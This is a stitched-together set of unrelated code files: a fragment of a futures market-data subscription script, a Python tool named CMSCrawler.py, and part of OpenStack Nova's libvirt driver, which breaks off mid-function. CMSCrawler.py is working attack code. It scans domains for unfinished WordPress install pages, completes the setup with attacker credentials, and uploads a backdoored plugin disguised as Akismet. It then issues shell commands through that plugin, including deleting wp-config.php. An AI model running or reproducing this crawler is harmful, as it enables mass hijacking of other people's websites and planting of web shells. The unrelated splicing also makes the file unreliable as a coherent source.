## 订阅合约,测试通过
print('subscribe')
i = api.subscribeMarketData('sc1906')
## 退订合约,测试通过
#i = api.unSubscribeMarketData('IF1505')
# 订阅询价,测试通过
#i = api.subscribeForQuoteRsp('IO1504-C-3900')
# 退订询价,测试通过
#i = api.unSubscribeForQuoteRsp('IO1504-C-3900')
if __name__ == '__main__':
# 主程序
thread = Thread(target=main, args=())
thread.start()
|
CMSCrawler.py
|
from multiprocessing import Process,Queue
import requests
import urllib3
from random import choice
import string
import shutil
import os
import sys
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
#############################
########## Const ############
#############################
config_path = './config.json'
class CMS():
def __init__(self):
self._analized_domains = {}
self.config = {}
self._read_config_from_file()
self._fire_process()
def _read_config_from_file(self):
with open(config_path, 'r') as f:
self.config_content = f.read()
for line in self.config_content.split('\n'):
if len(line) == 0: continue
if line[0] != '#':
key = line.split('=')[0]
value = line.split('=')[1]
self.config[key] = value
def _fire_process(self):
self._queue = Queue()
self._process_list = []
for i in range(int(self.config['PROC_QUANTITY'])):
proc = Process(target=self._crawl, args=())
proc.daemon = True
proc.start()
self._process_list.append(proc)
def _crawl(self):
while True:
self.domain = self._queue.get(True)
if self.domain == 'KILL': return
if self.domain not in self._analized_domains.keys():
if self._is_cms_install_page(): self._attack_cms()
else: self._analized_domains[self.domain] = {'Quantity': 1}
def _is_cms_install_page(self):
cms_type = None
url = 'http://{}/'.format(self.domain)
try:
res = requests.get(url, timeout=5, verify=False)
except requests.exceptions.Timeout:
#print('[*] - Timeout..')
return False
except requests.exceptions.TooManyRedirects:
#print('[*] - To many redirects..')
#print(self.domain)
return False
except requests.exceptions.ConnectionError:
#print('[*] - ConnectionError..')
return False
except requests.exceptions.RequestException as e:
print('[*] - Exception, but I dont know :(')
print(e)
return False
except Exception as e:
print('[*] - {}'.format(self.domain))
print('[*] - Exception, but I dont know :(')
print(e)
if res.status_code == 200:
#print('[*] - Processing {}'.format(self.domain))
if '<title>WordPress › Setup Configuration File</title>' in res.text: cms_type = 'wordpress'
elif '<title>Joomla! Web Installer</title>' in res.text: cms_type = 'joomla'
elif 'Choose language | Drupal' in res.text: cms_type = 'drupal_8'
elif 'Select an installation profile' in res.text: cms_type = 'drupal_7'
elif '<p>LocalSettings.php not found.</p>' in res.text: cms_type = 'mediawiki'
elif '<title>Installing TYPO3 CMS</title>' in res.text: cms_type = 'typo3'
elif '<h2>Welcome to the Serendipity Installation</h2>' in res.text: cms_type = 'serendipity'
elif '<body ng-app="app" id="installation">' in res.text: cms_type = 'piwik'
elif '<a href="/phpbb/install/app.php/install">Install</a>' in res.text: cms_type = 'phpbb'
elif 'config.php is missing or corrupt.' in res.text: cms_type = 'textpattern'
#www-auth header to authenticate (basic auth)
elif res.status_code == 401: x=0
#Unauthorized
elif res.status_code == 403: x=0
#page not found (keep trying...)
elif res.status_code == 404: x=0
#Server internal errors (keep trying...)
elif res.status_code == 500: x=0
elif res.status_code == 501: x=0
elif res.status_code == 503: x=0
else: x=0
if cms_type is None: return False
print('[*] - CMS Type is {}'.format(cms_type))
print('[*] - {}'.format(self.domain))
if cms_type is 'wordpress': return True
else: return False
#return True
def _attack_cms(self):
payload_post = {
'dbname': self.config['MYSQL_DB_NAME'],
'uname': self.config['MYSQL_USERNAME'],
'pwd': self.config['MYSQL_DB_PW'],
'dbhost': self.config['MYSQL_HOST'],
'prefix': 'wp_',
'language': 'en_US',
'submit': 'Submit'
}
res = requests.post('http://'+self.domain+'/wp-admin/setup-config.php',params={'step': 2}, data=payload_post)
if res.status_code != 200: return False
print(res.status_code)
payload_post = {
'weblog_title': 'test',
'user_name': self.config['WORDPRESS_ADM'],
'admin_password': self.config['WORDPRESS_ADM_PW'],
'pass1-text': self.config['WORDPRESS_ADM_PW'],
'admin_password2': self.config['WORDPRESS_ADM_PW'],
'admin_email': 'admin@gmail.com',
'Submit': 'Install WordPress',
'language': 'en_US'
}
res = requests.post('http://'+self.domain+'/wp-admin/install.php', params={'step': 2}, data=payload_post)
if res.status_code == 500 and 'Error establishing a database connection' in res.text:
print('[*] - Error al conectarse a la DB')
sys.exit(2)
payload_post = {
'log': self.config['WORDPRESS_ADM'],
'pwd': self.config['WORDPRESS_ADM_PW'],
'wp-submit': 'Log In',
'redirect_to': 'http://{}/wp-admin/'.format(self.domain),
'testcookie': 1
}
res = requests.post('http://'+self.domain+'/wp-login.php', data=payload_post)
cookies = res.cookies
r3 = requests.get('http://{}/wp-admin/plugin-install.php'.format(self.domain), cookies=cookies)
look_for = 'name="_wpnonce" value="'
try:
nonceText = r3.text.split(look_for, 1)[1]
nonce = nonceText[0:10]
except:
print("Didn't find a CSRF token, check the URL and/or credentials.")
sys.exit(2)
uploaddir = 'akismet'
zipped_file = self._zip_plugin()
files = {
'pluginzip': (uploaddir + '.zip', open(zipped_file, 'rb')),
'_wpnonce': (None, nonce),
'_wp_http_referer': (None, self.domain + '/wp-admin/plugin-install.php?tab=upload'),
'install-plugin-submit': (None,'Install Now')
}
r4 = requests.post('http://'+self.domain+'/wp-admin/update.php',
files=files,
params={'action': 'upload-plugin'},
cookies=cookies)
if r4.status_code == 200:
print("Backdoor uploaded!")
if "Plugin installed successfully" in r4.text:
print("Plugin installed successfully")
if "Destination folder already exists" in r4.text:
print("Destination folder already exists")
self._remove_wp_config_file()
os.remove(zipped_file)
return True
def _send_cmd_shell(self,params):
for x in range(1,10):
r = requests.get('http://'+self.domain+'/wp-content/plugins/akismet-{}/class.akismet-plug.php'.format(str(x)), params=params)
if r.status_code == 200: return r
def _get_default_params_for_shell(self):
return {
'cmdexe': '',
'path': self.config['DEFAULT_PATH'],
'username': self.config['SHELL_USER'],
'password': self.config['SHELL_PW']
}
def _remove_wp_config_file(self):
params = self._get_default_params_for_shell()
params['cmdexe'] = 'rm -f ./wp-config.php'
self._send_cmd_shell(params)
def _zip_plugin(self):
file = '/tmp/akismet'
try: os.remove(file)
except: print('[*] - NoFile {}'.format(file))
shutil.copyfile(self.new_shell_file, self.config['PLUGIN_FILE_INFECT'])
print(shutil.make_archive(file, 'zip', self.config['PLUGIN_UPLOAD']))
os.remove(self.new_shell_file)
return file+'.zip'
def process(self,domain):
self._queue.put(domain)
|
driver.py
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A connection to a hypervisor through libvirt.
Supports KVM, LXC, QEMU, UML, and XEN.
**Related Flags**
:libvirt_type: Libvirt domain type. Can be kvm, qemu, uml, xen
(default: kvm).
:libvirt_uri: Override for the default libvirt URI (depends on libvirt_type).
:libvirt_disk_prefix: Override the default disk prefix for the devices
attached to a server.
:rescue_image_id: Rescue ami image (None = original image).
:rescue_kernel_id: Rescue aki image (None = original image).
:rescue_ramdisk_id: Rescue ari image (None = original image).
:injected_network_template: Template file for injected network
:allow_same_net_traffic: Whether to allow in project network traffic
"""
import errno
import eventlet
import functools
import glob
import os
import shutil
import socket
import sys
import tempfile
import time
import uuid
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from eventlet import util as eventlet_util
from lxml import etree
from oslo.config import cfg
from xml.dom import minidom
from nova.api.metadata import base as instance_metadata
from nova import block_device
from nova.compute import instance_types
from nova.compute import power_state
from nova.compute import task_states
from nova.compute import vm_mode
from nova import context as nova_context
from nova import exception
from nova.image import glance
from nova.openstack.common import excutils
from nova.openstack.common import fileutils
from nova.openstack.common import importutils
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common.notifier import api as notifier
from nova import utils
from nova import version
from nova.virt import configdrive
from nova.virt.disk import api as disk
from nova.virt import driver
from nova.virt import event as virtevent
from nova.virt import firewall
from nova.virt.libvirt import blockinfo
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import firewall as libvirt_firewall
from nova.virt.libvirt import imagebackend
from nova.virt.libvirt import imagecache
from nova.virt.libvirt import utils as libvirt_utils
from nova.virt import netutils
native_threading = patcher.original("threading")
native_Queue = patcher.original("Queue")
libvirt = None
LOG = logging.getLogger(__name__)
libvirt_opts = [
cfg.StrOpt('rescue_image_id',
default=None,
help='Rescue ami image'),
cfg.StrOpt('rescue_kernel_id',
default=None,
help='Rescue aki image'),
cfg.StrOpt('rescue_ramdisk_id',
default=None,
help='Rescue ari image'),
cfg.StrOpt('libvirt_type',
default='kvm',
help='Libvirt domain type (valid options are: '
'kvm, lxc, qemu, uml, xen)'),
cfg.StrOpt('libvirt_uri',
default='',
help='Override the default libvirt URI '
'(which is dependent on libvirt_type)'),
cfg.BoolOpt('libvirt_inject_password',
default=False,
help='Inject the admin password at boot time, '
'without an agent.'),
cfg.BoolOpt('libvirt_inject_key',
default=True,
help='Inject the ssh public key at boot time'),
cfg.IntOpt('libvirt_inject_partition',
default=1,
help='The partition to inject to : '
'-2 => disable, -1 => inspect (libguestfs only), '
'0 => not partitioned, >0 => partition number'),
cfg.BoolOpt('use_usb_tablet',
default=True,
help='Sync virtual and real mouse cursors in Windows VMs'),
cfg.StrOpt('live_migration_uri',
default="qemu+tcp://%s/system",
help='Migration target URI '
'(any included "%s" is replaced with '
'the migration target hostname)'),
cfg.StrOpt('live_migration_flag',
default='VIR_MIGRATE_UNDEFINE_SOURCE, VIR_MIGRATE_PEER2PEER',
help='Migration flags to be set for live migration'),
cfg.StrOpt('block_migration_flag',
default='VIR_MIGRATE_UNDEFINE_SOURCE, VIR_MIGRATE_PEER2PEER, '
'VIR_MIGRATE_NON_SHARED_INC',
help='Migration flags to be set for block migration'),
cfg.IntOpt('live_migration_bandwidth',
default=0,
help='Maximum bandwidth to be used during migration, in Mbps'),
cfg.StrOpt('snapshot_image_format',
default=None,
help='Snapshot image format (valid options are : '
'raw, qcow2, vmdk, vdi). '
'Defaults to same as source image'),
cfg.StrOpt('libvirt_vif_driver',
default='nova.virt.libvirt.vif.LibvirtGenericVIFDriver',
help='The libvirt VIF driver to configure the VIFs.'),
cfg.ListOpt('libvirt_volume_drivers',
default=[
'iscsi=nova.virt.libvirt.volume.LibvirtISCSIVolumeDriver',
'local=nova.virt.libvirt.volume.LibvirtVolumeDriver',
'fake=nova.virt.libvirt.volume.LibvirtFakeVolumeDriver',
'rbd=nova.virt.libvirt.volume.LibvirtNetVolumeDriver',
'sheepdog=nova.virt.libvirt.volume.LibvirtNetVolumeDriver',
'nfs=nova.virt.libvirt.volume.LibvirtNFSVolumeDriver',
'aoe=nova.virt.libvirt.volume.LibvirtAOEVolumeDriver',
'glusterfs='
'nova.virt.libvirt.volume.LibvirtGlusterfsVolumeDriver',
'fibre_channel=nova.virt.libvirt.volume.'
'LibvirtFibreChannelVolumeDriver',
'scality='
'nova.virt.libvirt.volume.LibvirtScalityVolumeDriver',
],
help='Libvirt handlers for remote volumes.'),
cfg.StrOpt('libvirt_disk_prefix',
default=None,
help='Override the default disk prefix for the devices attached'
' to a server, which is dependent on libvirt_type. '
'(valid options are: sd, xvd, uvd, vd)'),
cfg.IntOpt('libvirt_wait_soft_reboot_seconds',
default=120,
help='Number of seconds to wait for instance to shut down after'
' soft reboot request is made. We fall back to hard reboot'
' if instance does not shutdown within this window.'),
cfg.BoolOpt('libvirt_nonblocking',
default=True,
help='Use a separated OS thread pool to realize non-blocking'
' libvirt calls'),
cfg.StrOpt('libvirt_cpu_mode',
default=None,
help='Set to "host-model" to clone the host CPU feature flags; '
'to "host-passthrough" to use the host CPU model exactly; '
'to "custom" to use a named CPU model; '
'to "none" to not set any CPU model. '
'If libvirt_type="kvm|qemu", it will default to '
'"host-model", otherwise it will default to "none"'),
cfg.StrOpt('libvirt_cpu_model',
default=None,
help='Set to a named libvirt CPU model (see names listed '
'in /usr/share/libvirt/cpu_map.xml). Only has effect if '
'libvirt_cpu_mode="custom" and libvirt_type="kvm|qemu"'),
cfg.StrOpt('libvirt_snapshots_directory',
default='$instances_path/snapshots',
help='Location where libvirt driver will store snapshots '
'before uploading them to image service'),
cfg.StrOpt('xen_hvmloader_path',
default='/usr/lib/xen/boot/hvmloader',
help='Location where the Xen hvmloader is kept'),
cfg.ListOpt('disk_cachemodes',
default=[],
help='Specific cachemodes to use for different disk types '
'e.g: ["file=directsync","block=none"]'),
]
CONF = cfg.CONF
CONF.register_opts(libvirt_opts)
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('my_ip', 'nova.netconf')
CONF.import_opt('default_ephemeral_format', 'nova.virt.driver')
CONF.import_opt('use_cow_images', 'nova.virt.driver')
CONF.import_opt('live_migration_retry_count', 'nova.compute.manager')
CONF.import_opt('vncserver_proxyclient_address', 'nova.vnc')
CONF.import_opt('server_proxyclient_address', 'nova.spice', group='spice')
DEFAULT_FIREWALL_DRIVER = "%s.%s" % (
libvirt_firewall.__name__,
libvirt_firewall.IptablesFirewallDriver.__name__)
MAX_CONSOLE_BYTES = 102400
def patch_tpool_proxy():
"""eventlet.tpool.Proxy doesn't work with old-style class in __str__()
or __repr__() calls. See bug #962840 for details.
We perform a monkey patch to replace those two instance methods.
"""
def str_method(self):
return str(self._obj)
def repr_method(self):
return repr(self._obj)
tpool.Proxy.__str__ = str_method
tpool.Proxy.__repr__ = repr_method
patch_tpool_proxy()
VIR_DOMAIN_NOSTATE = 0
VIR_DOMAIN_RUNNING = 1
VIR_DOMAIN_BLOCKED = 2
VIR_DOMAIN_PAUSED = 3
VIR_DOMAIN_SHUTDOWN = 4
VIR_DOMAIN_SHUTOFF = 5
VIR_DOMAIN_CRASHED = 6
VIR_DOMAIN_PMSUSPENDED = 7
LIBVIRT_POWER_STATE = {
VIR_DOMAIN_NOSTATE: power_state.NOSTATE,
VIR_DOMAIN_RUNNING: power_state.RUNNING,
# NOTE(maoy): The DOMAIN_BLOCKED state is only valid in Xen.
# It means that the VM is running and the vCPU is idle. So,
# we map it to RUNNING
VIR_DOMAIN_BLOCKED: power_state.RUNNING,
VIR_DOMAIN_PAUSED: power_state.PAUSED,
# NOTE(maoy): The libvirt API doc says that DOMAIN_SHUTDOWN
# means the domain is being shut down. So technically the domain
# is still running. SHUTOFF is the real powered off state.
# But we will map both to SHUTDOWN anyway.
# http://libvirt.org/html/libvirt-libvirt.html
VIR_DOMAIN_SHUTDOWN: power_state.SHUTDOWN,
VIR_DOMAIN_SHUTOFF: power_state.SHUTDOWN,
VIR_DOMAIN_CRASHED: power_state.CRASHED,
VIR_DOMAIN_PMSUSPENDED: power_state.SUSPENDED,
}
MIN_LIBVIRT_VERSION = (0, 9, 6)
# When the above version matches/exceeds this version
# delete it & corresponding code using it
MIN_LIBVIRT_HOST_CPU_VERSION = (0, 9, 10)
# Live snapshot requirements
REQ_HYPERVISOR_LIVESNAPSHOT = "QEMU"
MIN_LIBVIRT_LIVESNAPSHOT_VERSION = (1, 0, 0)
MIN_QEMU_LIVESNAPSHOT_VERSION = (1, 3, 0)
class LibvirtDriver(driver.ComputeDriver):
capabilities = {
"has_imagecache": True,
"supports_recreate": True,
}
def __init__(self, virtapi, read_only=False):
super(LibvirtDriver, self).__init__(virtapi)
global libvirt
if libvirt is None:
libvirt = __import__('libvirt')
self._host_state = None
self._initiator = None
self._fc_wwnns = None
self._fc_wwpns = None
self._wrapped_conn = None
self._caps = None
self.read_only = read_only
self.firewall_driver = firewall.load_driver(
DEFAULT_FIREWALL_DRIVER,
self.virtapi,
get_connection=self._get_connection)
vif_class = importutils.import_class(CONF.libvirt_vif_driver)
self.vif_driver = vif_class(self._get_connection)
self.volume_drivers = driver.driver_dict_from_config(
CONF.libvirt_volume_drivers, self)
self._host_state = None
self._event_queue = None
self._disk_cachemode = None
self.image_cache_manager = imagecache.ImageCacheManager()
self.image_backend = imagebackend.Backend(CONF.use_cow_images)
self.disk_cachemodes = {}
self.valid_cachemodes = ["default",
"none",
"writethrough",
"writeback",
"directsync",
"writethrough",
"unsafe",
]
for mode_str in CONF.disk_cachemodes:
disk_type, sep, cache_mode = mode_str.partition('=')
if cache_mode not in self.valid_cachemodes:
LOG.warn(_("Invalid cachemode %(cache_mode)s specified "
"for disk type %(disk_type)s.") % locals())
continue
self.disk_cachemodes[disk_type] = cache_mode
@property
def disk_cachemode(self):
if self._disk_cachemode is None:
# We prefer 'none' for consistent performance, host crash
# safety & migration correctness by avoiding host page cache.
# Some filesystems (eg GlusterFS via FUSE) don't support
# O_DIRECT though. For those we fallback to 'writethrough'
# which gives host crash safety, and is safe for migration
# provided the filesystem is cache coherant (cluster filesystems
# typically are, but things like NFS are not).
self._disk_cachemode = "none"
if not self._supports_direct_io(CONF.instances_path):
self._disk_cachemode = "writethrough"
return self._disk_cachemode
@property
def host_state(self):
if not self._host_state:
self._host_state = HostState(self)
return self._host_state
def set_cache_mode(self, conf):
"""Set cache mode on LibvirtConfigGuestDisk object."""
try:
source_type = conf.source_type
driver_cache = conf.driver_cache
except AttributeError:
return
cache_mode = self.disk_cachemodes.get(source_type,
driver_cache)
conf.driver_cache = cache_mode
def has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
def _munge_version(ver):
return ver[0] * 1000000 + ver[1] * 1000 + ver[2]
try:
if lv_ver is not None:
libvirt_version = self._conn.getLibVersion()
if libvirt_version < _munge_version(lv_ver):
return False
if hv_ver is not None:
hypervisor_version = self._conn.getVersion()
if hypervisor_version < _munge_version(hv_ver):
return False
if hv_type is not None:
hypervisor_type = self._conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager."""
while True:
self._dispatch_events()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self.queue_event(). Any use of logging APIs
in particular is forbidden."""
self = opaque
uuid = dom.UUIDString()
transition = None
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread."""
if self._event_queue is None:
LOG.debug("Event loop thread is not active, "
"discarding event %s" % event)
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events."""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
while not self._event_queue.empty():
try:
event = self._event_queue.get(block=False)
self.emit_event(event)
except native_Queue.Empty:
pass
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0."""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = eventlet_util.__original_socket__(socket.AF_INET,
socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = eventlet_util.__original_socket__(socket.AF_INET,
socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug("Starting native event thread")
event_thread = native_threading.Thread(target=self._native_thread)
event_thread.setDaemon(True)
event_thread.start()
LOG.debug("Starting green dispatch thread")
dispatch_thread = eventlet.spawn(self._dispatch_thread)
def init_host(self, host):
libvirt.virEventRegisterDefaultImpl()
if not self.has_min_version(MIN_LIBVIRT_VERSION):
major = MIN_LIBVIRT_VERSION[0]
minor = MIN_LIBVIRT_VERSION[1]
micro = MIN_LIBVIRT_VERSION[2]
LOG.error(_('Nova requires libvirt version '
'%(major)i.%(minor)i.%(micro)i or greater.') %
locals())
self._init_events()
def _get_connection(self):
if not self._wrapped_conn or not self._test_connection():
LOG.debug(_('Connecting to libvirt: %s'), self.uri())
if not CONF.libvirt_nonblocking:
self._wrapped_conn = self._connect(self.uri(),
self.read_only)
else:
self._wrapped_conn = tpool.proxy_call(
(libvirt.virDomain, libvirt.virConnect),
self._connect, self.uri(), self.read_only)
try:
LOG.debug("Registering for lifecycle events %s" % str(self))
self._wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
except Exception, e:
LOG.warn(_("URI %s does not support events"),
self.uri())
return self._wrapped_conn
_conn = property(_get_connection)
def _test_connection(self):
try:
self._wrapped_conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() == libvirt.VIR_ERR_SYSTEM_ERROR and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug(_('Connection to libvirt broke'))
return False
raise
@staticmethod
def uri():
if CONF.libvirt_type == 'uml':
uri = CONF.libvirt_uri or 'uml:///system'
elif CONF.libvirt_type == 'xen':
uri = CONF.libvirt_uri or 'xen:///'
elif CONF.libvirt_type == 'lxc':
uri = CONF.libvirt_uri or 'lxc:///'
else:
uri = CONF.libvirt_uri or 'qemu:///system'
return uri
@staticmethod
def _connect(uri, read_only):
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
LOG.warning(
_("Can not handle authentication request for %d credentials")
% len(creds))
raise exception.NovaException(
_("Can not handle authentication request for %d credentials")
% len(creds))
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
_connect_auth_cb,
None]
try:
if read_only:
return libvirt.openReadOnly(uri)
else:
return libvirt.openAuth(uri, auth, 0)
except libvirt.libvirtError as ex:
LOG.exception(_("Connection to libvirt failed: %s"), ex)
payload = dict(ip=LibvirtDriver.get_host_ip_addr(),
method='_connect',
reason=ex)
notifier.notify(nova_context.get_admin_context(),
notifier.publisher_id('compute'),
'compute.libvirt.error',
notifier.ERROR,
payload)
pass
def get_num_instances(self):
"""Efficient override of base instance_exists method."""
return self._conn.numOfDomains()
def instance_exists(self, instance_name):
"""Efficient override of base instance_exists method."""
try:
self._lookup_by_name(instance_name)
return True
except exception.NovaException:
return False
def legacy_nwinfo(self):
return True
# TODO(Shrews): Remove when libvirt Bugzilla bug # 836647 is fixed.
def list_instance_ids(self):
if self._conn.numOfDomains() == 0:
return []
return self._conn.listDomainsID()
def list_instances(self):
names = []
for domain_id in self.list_instance_ids():
try:
# We skip domains with ID 0 (hypervisors).
if domain_id != 0:
domain = self._conn.lookupByID(domain_id)
names.append(domain.name())
except libvirt.libvirtError:
# Instance was deleted while listing... ignore it
pass
# extend instance list to contain also defined domains
names.extend([vm for vm in self._conn.listDefinedDomains()
if vm not in names])
return names
def list_instance_uuids(self):
return [self._conn.lookupByName(name).UUIDString()
for name in self.list_instances()]
def plug_vifs(self, instance, network_info):
"""Plug VIFs into networks."""
for (network, mapping) in network_info:
self.vif_driver.plug(instance, (network, mapping))
def unplug_vifs(self, instance, network_info):
"""Unplug VIFs from networks."""
for (network, mapping) in network_info:
self.vif_driver.unplug(instance, (network, mapping))
def _destroy(self, instance):
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.NotFound:
virt_dom = None
# If the instance is already terminated, we're still happy
# Otherwise, destroy it
old_domid = -1
if virt_dom is not None:
try:
old_domid = virt_dom.ID()
virt_dom.destroy()
except libvirt.libvirtError as e:
is_okay = False
errcode = e.get_error_code()
if errcode == libvirt.VIR_ERR_OPERATION_INVALID:
# If the instance is already shut off, we get this:
# Code=55 Error=Requested operation is not valid:
# domain is not running
(state, _max_mem, _mem, _cpus, _t) = virt_dom.info()
state = LIBVIRT_POWER_STATE[state]
if state == power_state.SHUTDOWN:
is_okay = True
if not is_okay:
with excutils.save_and_reraise_exception():
LOG.error(_("Error from libvirt during destroy. "
"Code=%(errcode)s Error=%(e)s") %
locals(), instance=instance)
def _wait_for_destroy(expected_domid):
"""Called at an interval until the VM is gone."""
# NOTE(vish): If the instance disappears during the destroy
# we ignore it so the cleanup can still be
# attempted because we would prefer destroy to
# never fail.
try:
dom_info = self.get_info(instance)
state = dom_info['state']
new_domid = dom_info['id']
except exception.NotFound:
LOG.error(_("During wait destroy, instance disappeared."),
instance=instance)
raise utils.LoopingCallDone()
if state == power_state.SHUTDOWN:
LOG.info(_("Instance destroyed successfully."),
instance=instance)
raise utils.LoopingCallDone()
# NOTE(wangpan): If the instance was booted again after destroy,
# this may be a endless loop, so check the id of
# domain here, if it changed and the instance is
# still running, we should destroy it again.
# see https://bugs.launchpad.net/nova/+bug/1111213 for more details
if new_domid != expected_domid:
LOG.info(_("Instance may be started again."),
instance=instance)
kwargs['is_running'] = True
raise utils.LoopingCallDone()
kwargs = {'is_running': False}
timer = utils.FixedIntervalLoopingCall(_wait_for_destroy, old_domid)
timer.start(interval=0.5).wait()
if kwargs['is_running']:
LOG.info(_("Going to destroy instance again."), instance=instance)
self._destroy(instance)
def destroy(self, instance, network_info, block_device_info=None,
destroy_disks=True):
self._destroy(instance)
self._cleanup(instance, network_info, block_device_info, destroy_disks)
def _undefine_domain(self, instance):
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.NotFound:
virt_dom = None
if virt_dom:
try:
try:
virt_dom.undefineFlags(
libvirt.VIR_DOMAIN_UNDEFINE_MANAGED_SAVE)
except libvirt.libvirtError:
LOG.debug(_("Error from libvirt during undefineFlags."
" Retrying with undefine"), instance=instance)
virt_dom.undefine()
except AttributeError:
# NOTE(vish): Older versions of libvirt don't support
# undefine flags, so attempt to do the
# right thing.
try:
if virt_dom.hasManagedSaveImage(0):
virt_dom.managedSaveRemove(0)
except AttributeError:
pass
virt_dom.undefine()
except libvirt.libvirtError as e:
with excutils.save_and_reraise_exception():
errcode = e.get_error_code()
LOG.error(_("Error from libvirt during undefine. "
"Code=%(errcode)s Error=%(e)s") %
locals(), instance=instance)
def _cleanup(self, instance, network_info, block_device_info,
destroy_disks):
self._undefine_domain(instance)
self.unplug_vifs(instance, network_info)
retry = True
while retry:
try:
self.firewall_driver.unfilter_instance(instance,
network_info=network_info)
except libvirt.libvirtError as e:
try:
state = self.get_info(instance)['state']
except exception.NotFound:
state = power_state.SHUTDOWN
if state != power_state.SHUTDOWN:
LOG.warn(_("Instance may be still running, destroy "
"it again."), instance=instance)
self._destroy(instance)
else:
retry = False
errcode = e.get_error_code()
LOG.error(_("Error from libvirt during unfilter. "
"Code=%(errcode)s Error=%(e)s") %
locals(), instance=instance)
reason = "Error unfiltering instance."
raise exception.InstanceTerminationFailure(reason=reason)
except Exception:
retry = False
raise
else:
retry = False
# FIXME(wangpan): if the instance is booted again here, such as the
# the soft reboot operation boot it here, it will
# become "running deleted", should we check and destroy
# it at the end of this method?
# NOTE(vish): we disconnect from volumes regardless
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
if destroy_disks:
target = libvirt_utils.get_instance_path(instance)
LOG.info(_('Deleting instance files %(target)s') % locals(),
instance=instance)
if os.path.exists(target):
# If we fail to get rid of the directory
# tree, this shouldn't block deletion of
# the instance as whole.
try:
shutil.rmtree(target)
except OSError, e:
LOG.error(_("Failed to cleanup directory %(target)s: %(e)s"
) % locals())
#NOTE(bfilippov): destroy all LVM disks for this instance
self._cleanup_lvm(instance)
def _cleanup_lvm(self, instance):
"""Delete all LVM disks for given instance object."""
disks = self._lvm_disks(instance)
if disks:
libvirt_utils.remove_logical_volumes(*disks)
def _lvm_disks(self, instance):
